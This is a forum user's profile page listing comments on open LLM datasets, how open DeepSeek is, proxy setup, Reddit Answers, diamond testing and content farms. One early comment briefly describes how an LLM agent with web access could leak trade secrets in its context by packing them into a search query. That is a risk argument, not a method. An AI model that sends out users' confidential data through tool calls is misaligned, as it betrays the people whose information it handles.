Programmer and sysadmin (DevOps?), wannabe polymath in tech, science and the mind. Neurodivergent, disabled, burned out, and close to throwing in the towel, but still liking ponies 🦄 and sometimes willing to discuss stuff.

  • 0 Posts
  • 123 Comments
Joined 2 years ago
cake
Cake day: June 26th, 2023

help-circle
  • There are several “good” LLMs trained on open datasets like FineWeb, LAION, DataComp, etc. They are still “ethically dubious”, but at least they can be downloaded, analyzed, filtered, and so on. Unfortunately businesses are keeping datasets and training code as a competitive advantage, even "Open"AI stopped publishing them when they saw an opportunity to make money.

    What is the concern with only having weights? It’s not abritrary code exectution

    Unless one plugs it into an agent… which is kind of the use we expect right now.

    Accessing the web, or even web searches, is already equivalent to arbitrary code execution: an LLM could decide to, for example, summarize and compress some context full of trade secrets, then proceed to “search” for it, sending it to wherever it has access to.

    Agents can also be allowed to run local commands… again a use we kind of want now (“hey Google, open my alarms” on a smartphone).



  • Open source requires giving whatever digital information is necessary to build a binary.

    In this case, the “binary” are the network weights, and “whatever is necessary” includes both training data, and training code.

    DeepSeek is sharing:

    • NO training data
    • NO training code
    • instead, PDFs with a description of the process
    • binary weights (a few snapshots)
    • fine-tune code
    • inference code
    • evaluation code
    • integration code

    In other words: a good amount of open source… with a huge binary blob in the middle.





  • Is this on the same machine, or multiple machines?

    The typical/easy design for an outgoing proxy, would be to set the proxy on one machine, configure the client on another machine to connect to the proxy, and drop any packets from the client that aren’t targeted at the proxy.

    For a transparent proxy, all connections coming from a client could be rewritten via NAT to go to the proxy, then the proxy can decide which ones it can handle or is willing to.

    If you try to fold this up into a single machine, I’d suggest using containers to keep things organized.



  • Reddit as “reservoir of humanity”… and the example is r/AITA, the most notoriously fake subreddit out there?? 🤣🤣

    How disconnected from reality does one have to be to write something like that.

    Reddit Answers takes anyone’s queries, trawls the site for relevant discussions and debates, and composes them into a response

    Then people feel entitled to insult me for having blanked most of my comments on Reddit. “Why did you do this, [expletive]?”… Yeah, why indeed. 😒










  • From that article (thanks for sharing, btw) it seems like there are a series of relatively simple tools to identify the different kinds of diamonds, the main problem being large assortments of small pieces.

    It only mentions laser inscriptions in passing, how easy would it be to counterfeit one? Seems like there are many aspects that can be checked relatively easily to see whether the actual characteristics match those in the inscribed ID?

    In the polarizer strain test, I’m not sure which one makes a better diamond, one with more or less stress lines. Since the main aspect of ornamental diamonds is the ability to bend light as many times as possible, would the extra stress lines help or hinder that?



  • Content farms have been a thing since the early 2000s, no AI needed, just stuff hastily written by outsourced workers for less than a minimum wage, then poorly translated and turned into templates to generate thousands of pages, in what some called “SEO”.

    Particularly, results for “file format” or “extension” have been a hot mess for the last 20 years or so, there was never a clean search… and yet, by searching right now for “glb file format specification”, the second link is to the canonical Khronos spec, the third one is the Wikipedia entry with links to the spec.

    That’s way better than it used to be.